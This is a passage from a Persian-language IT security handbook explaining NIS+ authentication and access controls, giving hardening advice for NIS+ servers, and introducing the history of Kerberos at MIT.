‫)ﺑﻌﺒﺎﺭﺕ ﺩﻳﮕﺮ ﻻﻳﺔ ﻣﻴﺎﻧﻲ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻧﺎﻣﺮﺋﻲ ﻣﻲﺷﻮﺩ(‪ .‬ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭﺍﺭﺩﺷﺪﻩ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺫﺧﻴﺮﻩﺷﺪﻩ ‪ NIS+‬ﻳﻜـﺴﺎﻥ ﻧﺒﺎﺷـﻨﺪ‪ ،‬ﺁﻧﮕـﺎﻩ ﻛـﺎﺭﺑﺮ‬

‫‪165‬‬ ‫‪Incremental Update‬‬


‫‪166‬‬ ‫‪NIS+ Root Server‬‬
‫‪167‬‬ ‫‪NIS+ Root Domain‬‬
‫‪168‬‬ ‫‪NIS+ Principals‬‬
‫‪169‬‬ ‫‪Objects‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٣٦‬‬

‫ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﻮﺭ ‪ keylogin‬ﻭﺍﺭﺩ ﺩﺍﻣﻨـﻪ ‪ NIS+‬ﺷـﻮﺩ‪ .‬ﻛـﺎﺭﺑﺮﺍﻥ ‪ NIS+‬ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﻓﺮﻣـﺎﻥ‬
‫‪ nispasswd‬ﻋﻮﺽ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻛﻪ ﺑﺴﻴﺎﺭ ﻣﺸﺎﺑﻪ ﻓﺮﻣﺎﻥ ‪ Unix passwd‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻛﺎﺭ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﻞ‬ ‫ﺍﻣﻨﻴﺖ ‪ NIS+‬ﺑﺎ ﻓﺮﺍﻫﻢ ﻛﺮﺩﻥ ﻳﻚ ﺍﺑﺰﺍﺭ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﻭ ﺑﺎ ﺍﻳﺠﺎﺩ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘـﺮ ﹺ‬
‫ﻝ ﺩﺳﺘﺮﺳـﻲ ﻛـﻪ ﺭﺍﻫﻬـﺎﻱ ﺗﻌﺎﻣـ ﹺ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﻩ ﺑﺎ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺟﺪﺍﻭﻝ ‪ NIS+‬ﺭﺍ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﻨﺪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻲﺷﻮﺩ‪ NIS+ .‬ﺩﻭ ﻧﻮﻉ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ :‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺤﻠﻲ ﺑﺮ ﺍﺳﺎﺱ ﺍﺟﺮﺍﻱ ﻳﻚ ﻓﺮﻣﺎﻥ ‪ NIS+‬ﺗﻮﺳﻂ ‪ UID‬ﺍﺳﺖ ﻭ ﺑﺼﻮﺭﺕ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﻱ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺍﺻﻠﻲ ‪ NIS+‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ DES‬ﻧﻴﺰ ﺑﺮ ﻣﺒﻨﺎﻱ ‪ Secure RPC‬ﺍﺳﺖ‪.‬‬
‫ﻫﺮ ﺷﻲﺀ ‪ NIS+‬ﻳﻚ "ﻣﺎﻟﻚ" ﺩﺍﺭﺩ‪ ،‬ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﻫﻤﺎﻥ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪﺓ ﺁﻥ ﻣﻲﺑﺎﺷﺪ )ﻣﺎﻟﻚ ﻳﻚ ﺷﻲﺀ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑـﺎ ﻓﺮﻣـﺎﻥ ‪ nischown‬ﺗﻐﻴﻴـﺮ ﺩﺍﺩ(‪.‬‬
‫ﺍﺷﻴﺎﻱ ‪ NIS+‬ﻫﻤﭽﻨﻴﻦ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﻣﻮﻛﻞ ﺩﺍﺭﺍﻱ ﭼﻪ ﻧـﻮﻋﻲ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺑﻪ ﺷﻲﺀ ﺍﺳﺖ ‪ -‬ﺧﻮﺍﻧﺪﻥ‪ ،‬ﺗﻐﻴﻴﺮ‪ ،‬ﺍﻳﺠﺎﺩ‪ ،‬ﺣﺬﻑ‪ ،‬ﻳﺎ ﺍﺩﻏﺎﻡ ‪ -‬ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﭼﻬﺎﺭ ﻧﻮﻉ ﻣﻮﻛﻞ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳﻚ ﺷﻲﺀ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ‪:‬‬
‫ﻫﻴﭽﻜﺲ )ﺗﻘﺎﺿﺎﻫﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻧﺸﺪﻩ(‪ ،‬ﻣﺎﻟﻚ ﺷﻲﺀ‪ ،‬ﻣﻮﻛﻼﻧﻲ ﻛﻪ ﺑﺎ ﺷﻲﺀ ﺩﺭ ﻳﻚ ﮔﺮﻭﻩ ﻫﺴﺘﻨﺪ‪ ،‬ﻭ ﻣﻮﻛﻼﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﺓ ﺩﻳﮕﺮ‪.‬‬
‫ﺟﺪﺍﻭﻝ ‪ NIS+‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺭﺩﻳﻔﻬﺎ‪ ،‬ﺳﺘﻮﻧﻬﺎ‪ ،‬ﻳﺎ ﺍﻗﻼﻡ ﺩﺍﺩﻩﺍﻱ ﻣﻨﻔﺮﺩ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﻴﺸﺘﺮ ﺑﺪﻫﻨـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﻫﻤـﺔ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﻩ ﺑﻪ ﻫﻤﺔ ﻗﺴﻤﺘﻬﺎﻱ ﻳﻚ ﺟﺪﻭﻝ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻧﺪﻥ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﻫﺮ ﻛﺎﺭﺑﺮ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧـﺪ ﺁﻥ ﺳـﻄﺮ ﺍﺯ ﺟـﺪﻭﻝ ﺭﺍ‬
‫ﻛﻪ ﺑﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺍﻭ ﻣﺮﺑﻮﻁ ﺍﺳﺖ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺍﺯ ﺁﻧﺠﺎ ﻛـﻪ ﺩﺳﺘﺮﺳـﻴﻬﺎﻱ ﺭﺩﻳﻔﻬـﺎ‪ ،‬ﺳـﺘﻮﻧﻬﺎ‪ ،‬ﻭ ﺍﻗـﻼﻡ ﺩﺍﺩﻩﺍﻱ‬
‫ﻣﻨﻔﺮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺑﺰﺭﮔﺘﺮ ﻛﻨﻨﺪ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﻣﺤﺪﻭﺩﻛﻨﻨﺪﺓ ﺑﻴﺸﺘﺮ‪ ،‬ﻗﺎﺑﻞ ﺍﻋﻤﺎﻝ ﻧﻤﻲﺑﺎﺷﻨﺪ‪.‬‬

‫ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ‪NIS+‬‬

‫ﺍﮔﺮ ‪ NIS+‬ﺩﺭﺳﺖ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻣﺪﻳﺮﻳﺖ ﺷﺒﻜﻪ ﺳﻴﺴﺘﻢ ﺑﺴﻴﺎﺭ ﺍﻣﻨﻲ ﺑﺎﺷﺪ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟـﻮﺩ‪ ،‬ﻣﺜـﻞ ﻫﻤـﺔ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻳﺎ ﻣﺪﻳﺮﻳﺖ ‪ NIS+‬ﺍﺷﺘﺒﺎﻫﻲ ﺭﺥ ﺩﻫﺪ ﻛﻪ ﻧﺘﻴﺠﺔ ﺁﻥ ﺑﺮ ﺷﺒﻜﻪﺍﻱ ﻛﻪ ‪NIS+‬‬
‫ﻼ ﻣﺴﺎﺋﻠﻲ ﺑﺮﺍﻱ ﺁﮔﺎﻫﻲ ﺫﻛﺮ ﻣﻲﺷﻮﺩ‪:‬‬
‫ﺍﺯ ﺁﻥ ﻣﺤﺎﻓﻈﺖ ﻣﻲﻛﻨﺪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻦ ﺍﻳﻤﻨﻲ ﺑﺎﺷﺪ‪ .‬ﺫﻳ ﹰ‬

‫‪ NIS+‬ﺭﺍ ﺩﺭ ﺣﺎﻟﺖ ﺳﺎﺯﮔﺎﺭﻱ ‪ ١٧٠NIS‬ﺍﺟﺮﺍ ﻧﻜﻨﻴﺪ‬


‫‪ NIS+‬ﺩﺍﺭﺍﻱ ﻳﻚ ﺣﺎﻟﺖ "ﺳﺎﺯﮔﺎﺭﻱ ‪ "NIS‬ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﻥ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS+‬ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺎ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﮔﺎﻥ ‪ NIS‬ﺍﺯ‬
‫ﺩﺭﻭﻥ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ‪ NIS+‬ﺭﺍ ﺩﺭ ﺍﻳﻦ ﺣﺎﻟﺖ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻫﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS‬ﺩﺭ ﺷﺒﻜﺔ ﺷﻤﺎ )ﻭ ﺷﺎﻳﺪ ﺣﺘﻲ ﺷﺒﻜﻪﻫﺎﻱ ﺩﻳﮕﺮ( ﻗﺎﺩﺭ‬
‫ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺑﻪ ﻫﺮ ﻗﻄﻌﻪﺍﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS+‬ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪.‬‬

‫ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺍﺷﻴﺎﻱ‪ NIS+‬ﺭﺍ ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‬
‫ﻫﻨﻮﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺮﺭﺳﻲ ﺟﺎﻣﻌﻴﺖ ‪ NIS+‬ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ ،‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺟﺪﻭﻟﻬﺎﻱ ‪ ،NIS+‬ﺩﺍﻳﺮﻛﺘـﻮﺭﻱﻫـﺎ‪ ،‬ﻭ ﮔﺮﻭﻫﻬـﺎ ﺑﺎﻳـﺪ ﺑـﺼﻮﺭﺕ ﺩﺳـﺘﻲ ﻭ ﺩﺭ‬
‫ﻓﻮﺍﺻﻞ ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺑﺮﺭﺳﻲ ﺷﻮﻧﺪ‪ .‬ﺩﺭ ﻣﻮﺭﺩ ﺍﺷﻴﺎﻳﻲ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻫﻴﭻ ﻳﺎ ﻫﻤﻪ ﻛﺲ ﺍﺟﺎﺯﻩ ﺗﻐﻴﻴﺮ ﺩﺍﺭﻧـﺪ ﻭ ﻫﻤﭽﻨـﻴﻦ ﺟـﺪﺍﻭﻟﻲ ﻛـﻪ ﺍﻳـﻦ ﺩﻭ‬
‫ﻃﺒﻘﻪ ﺍﺯ ﻣﻮﻛﻼﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺁﻧﻬﺎ ﺍﺷﻴﺎﻱ ﺟﺪﻳﺪ ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ ﻣﺮﺍﻗﺒﺖ ﺑﻪ ﺧﺮﺝ ﺩﻫﻴﺪ‪.‬‬

‫ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS+‬ﺭﻭﻱ ﺁﻧﻬﺎ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﺍﻳﻤﻦ ﻛﻨﻴﺪ‬


‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ NIS+‬ﺣﺪﺍﻛﺜﺮ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﺍﺟﺮﺍ ﻣﻲﺷﻮﺩ ﺍﻳﻤﻦ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﻣﻬﺎﺟﻤﻴﻦ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪NIS+‬‬
‫ﺩﺳﺘﺮﺳﻲ "‪ "root‬ﭘﻴﺪﺍ ﻛﻨﻨﺪ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﻫﺮ ﺗﻐﻴﻴﺮ ﺩﻟﺨﻮﺍﻩ ﺭﺍ ﺩﺭ ﺩﺍﻣﻨﺔ ‪ NIS+‬ﺍﻳﺠﺎﺩ ﻛﻨﻨﺪ‪ ،‬ﻛﻪ ﺍﻳﻦ ﺷﺎﻣﻞ ﺍﻳﺠﺎﺩ ﻛﺎﺭﺑﺮﺍﻥ ﺟﺪﻳﺪ‪ ،‬ﺗﻐﻴﻴﺮ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﻭ ﺣﺘﻲ ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺻﻠﻲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ NIS+‬ﻫﻢ ﻣﻲﺷﻮﺩ‪.‬‬

‫‪170 NIS Compatibility Mode‬‬


‫‪٣٣٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﺍﺯ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺷﻤﺎﺭﺓ ‪ NIS+ ۲‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‬


‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS+‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺳﻪ ﺳﻄﺢ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻧﺎﻣﻬﺎﻱ ‪ ،۱ ،۰‬ﻭ ‪ ۲‬ﻛﺎﺭ ﻛﻨﻨﺪ‪ .‬ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳـﻲ ﻭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛﺎﻣـﻞ‬
‫ﺍﻣﻨﻴﺘﻲ ﺗﻨﻬﺎ ﺩﺭ ﺳﻄﺢ ‪ ۲‬ﻓﻌﺎﻝ ﺍﺳﺖ‪ ،‬ﻭ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS+‬ﺗﻨﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺳﻄﺢ ‪ ۲‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬

‫‪Kerberos‬‬

‫ﺩﺭ ﺍﻭﺍﺧﺮ ﺩﻫﺔ ‪۱۹۸۰‬ﺩﺭ ﻣﺆﺳﺴﻪ ﻓﻨﺎﻭﺭﻱ ﻣﺎﺳﺎﭼﻮﺳﺖ )‪ ١٧١(MIT‬ﺻﺪﻫﺎ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻗﻮﻱ ﺑﻪ ﻫﻤﺮﺍﻩ ﻧﻤﺎﻳﺸﮕﺮﻫﺎﻱ ﺑﺰﺭﮒ‪ ،‬ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ‬
‫‪١٧٢‬‬
‫ﺳﺮﻳﻊ )ﺩﺭ ﺁﻧﺰﻣﺎﻥ(‪ ،‬ﺩﻳﺴﻜﻬﺎﻱ ﻛﻮﭼﻚ‪ ،‬ﻭ ﺭﺍﺑﻂﻫﺎﻱ ‪ ،Ethernet‬ﺟﺎﻳﮕﺰﻳﻦ ﺳﻴﺴﺘﻢ ﻗﺪﻳﻤﻲﺗﺮ ﻛﻪ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫﺎ ﻭ ﭼﻨﺪ ﺭﺍﻳﺎﻧﺔ ﺯﻣﺎﻥﻣﺸﺘﺮﻙ‬
‫ﺗﺸﻜﻴﻞ ﻳﺎﻓﺘﻪﺑﻮﺩ ﺷﺪ‪ .‬ﻫﺪﻑ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮﻳﻚ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﻭ ﺷﺒﻜﻪ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺍﻳﺴﺘﮕﺎﻩﻫﺎﻱ ﻛﺎﺭﻱ ﺷﺮﻭﻉ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻛﺮﺩﻧﺪ‪ ،‬ﻣﺸﻜﻞ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺷﺒﻜﻪ ﺑﻪ ﻃـﻮﺭ ﺁﺯﺍﺭﺩﻫﻨـﺪﻩﺍﻱ ﺁﺷـﻜﺎﺭ ﺷـﺪ‪ .‬ﭼـﻮﻥ ﺍﺯ‬
‫ﻫﻤﻪﺟﺎ ﻣﻲﺷﺪ ﺑﻪ ﺷﺒﻜﻪ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺖ‪ ،‬ﻫﻴﭻ ﭼﻴﺰﻱ ﻣﺎﻧﻊ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ )ﻳﺎ ﻣﻬﺎﺟﻤﻴﻦ ﺧﺎﺭﺝ ﻣﺆﺳﺴﻪ( ﻧﻤﻲﺷﺪ ﻛﻪ ﺍﺯ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺟﺎﺳﻮﺳـﻲ‬
‫ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻨﺪ‪ .‬ﺗﻘﺮﻳﺒﹰﺎ ﻏﻴﺮﻣﻤﻜﻦ ﺑﻮﺩ ﻛﻪ ﺑﺘﻮﺍﻥ ﺍﺯ ﺍﻓﺸﺎ ﺷﺪﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺻﻠﻲ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺗﻮﺳﻂ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﻳﺎ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ‬
‫ﻣﺠﺪﺩ ﺁﻧﻬﺎ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛﺎﺭﺑﺮﻱ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ‪ .‬ﭼﻴﺰﻱ ﻛﻪ ﻣﺸﻜﻼﺕ ﺭﺍ ﭘﻴﭽﻴﺪﻩﺗﺮ ﻣﻲﻛﺮﺩ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻣﺘﺼﻞ ﺑـﻪ‬
‫ﺷﺒﻜﻪ‪ ،‬ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ‪ IBM PC/AT‬ﺑﻮﺩﻧﺪ ﻭ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﻛﻪ ﺣﺘﻲ ﺍﺯ ﻣﻘﺪﻣﺎﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﻢ ﺑﻲﺑﻬﺮﻩ ﺑـﻮﺩ‪ .‬ﻛـﺎﺭﻱ ﺑﺎﻳـﺪ‬
‫ﺍﻧﺠﺎﻡ ﻣﻲﺷﺪ ﺗﺎ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺩﺭ ﺷﺒﻜﻪ ﺣﺪﺍﻗﻞ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺳﻴﺴﺘﻢ ﻗﺒﻠﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺯﻣﺎﻥﻣﺸﺘﺮﻙ ﺑﻮﺩ ﺣﻔﺎﻇﺖ ﺑﻪ ﻋﻤﻞ ﻣﻲﺁﻣﺪ‪.‬‬
‫ﺭﺍﻩﺣﻞ ﻧﻬﺎﻳﻲ ‪ MIT‬ﺑﺮﺍﻱ ﺭﻓﻊ ﺍﻳﻦ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ "‪ "Kerberos‬ﺑﻮﺩ؛ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﻪ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺣﺴﺎﺱ ‪ -‬ﻣﺜﻞ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺑﺎﺯ ‪ -‬ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ‪ DES‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩ‪ .‬ﻭﻗﺘﻲ ﻛـﺎﺭﺑﺮﻱ ﺩﺭ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﻛـﻪ‬
‫‪ Kerberos‬ﺭﻭﻱ ﺁﻥ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺍﺳﺖ ﻭﺍﺭﺩ ﺷﻮﺩ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺑﺮﺍﻱ ﺁﻥ ﻛﺎﺭﺑﺮ ﻳﻚ "ﺑﻠﻴﻂ" ﺻﺎﺩﺭ ﻣﻲﻛﻨﺪ‪ .‬ﺑﻠـﻴﻂ ﻛـﺎﺭﺑﺮ‬
‫ﺗﻨﻬﺎ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺑﺎﺯ ﻣﻲﺷﻮﺩ ﻭ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺑﺪﺳﺖﺁﻭﺭﺩﻥ ﺑﻠﻴﻄﻬﺎﻱ ﺩﻳﮕﺮ ﺍﺳﺖ‪ .‬ﺍﺯ ﺍﻳﻦ ﺩﻳـﺪﮔﺎﻩ‪ ،‬ﻫﺮﮔـﺎﻩ ﻛـﺎﺭﺑﺮ‬
‫ﺑﺨﻮﺍﻫﺪ ﺑﻪ ﻳﻜﻲ ﺍﺯ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪ ،‬ﺑﺎﻳﺪ ﻳﻚ ﺑﻠﻴﻂ ﺧﺎﺹ ﺁﻥ ﺳﺮﻭﻳﺲ ﺍﺭﺍﺋﻪ ﻛﻨـﺪ‪ .‬ﭼـﻮﻥ ﻫﻤـﺔ ﺍﻃﻼﻋـﺎﺕ ﺑﻠـﻴﻂﻫـﺎﻱ‬
‫‪ Kerberos‬ﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺭﻭﻱ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺍﺭﺳﺎﻟﻲ ﻗﺎﺑﻞ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻫﻢ ﻧﻴﺴﺘﻨﺪ‪.‬‬

‫‪ Kerberos 4‬ﻭ ‪Kerberos 5‬‬

‫ﭘﻨﺞ ﺑﺎﺯﻧﮕﺮﻱ ﺍﺳﺎﺳﻲ ﺩﺭ ﺗﺎﺭﻳﺦ ‪ Kerberos‬ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ ﻭ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺍﺯ ﺩﻭ ﻧـﺴﺨﺔ ‪ Kerberos‬ﺩﺭ ﺑـﺎﺯﺍﺭ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪.‬‬
